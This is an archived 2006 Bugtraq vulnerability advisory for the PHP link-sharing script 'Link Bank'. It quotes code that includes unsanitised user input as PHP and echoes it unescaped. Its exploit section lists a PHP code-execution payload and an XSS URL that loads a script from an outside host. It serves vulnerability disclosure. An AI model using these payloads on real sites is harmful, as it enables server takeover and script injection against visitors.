| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060306235213.30902.qmail@securityfocus.com>
Date: 6 Mar 2006 23:52:13 -0000
From: retard@...igs.com
To: bugtraq@...urityfocus.com
Subject: link bank code execution and xss
——– summary
software: Link Bank
vendors website: http://daverave.64digits.com/index.php?page=linkbank
versions: n/a
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard
risk level: high
——– description
Link Bank does not sanatise post sumbited to it allowing users to
insert data that can be used malisiously. after it is submited the
data goes to a .txt file witch the application reads and executes
to display the links submited. along with this it is vulnerable
to xss due to the application not sanatising the variable again.
in ./content/index.txt:
14 <?php
15 include("links.txt");
16 ?>
in ./content/add_link.txt:
2 $url_name = $_REQUEST['url_name'];
3 $url = $_REQUEST['url'];
4 $img = $_REQUEST['img'];
5 $filename = "content/links.txt";
6 $code = "<a href = iframe.php?site=$url target=_blank>$url_name</a><br>";
in ./iframe.php:
3 <title>Link Bank - <?php echo"$site";?></title>
——– exploit(s)
code execution:
submit something like <?php exec($cmd) ?> as a link name
xss:
http://example.com/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E
——– credit
author(s): retard
email: retard@...igs.com
Powered by blists - more mailing lists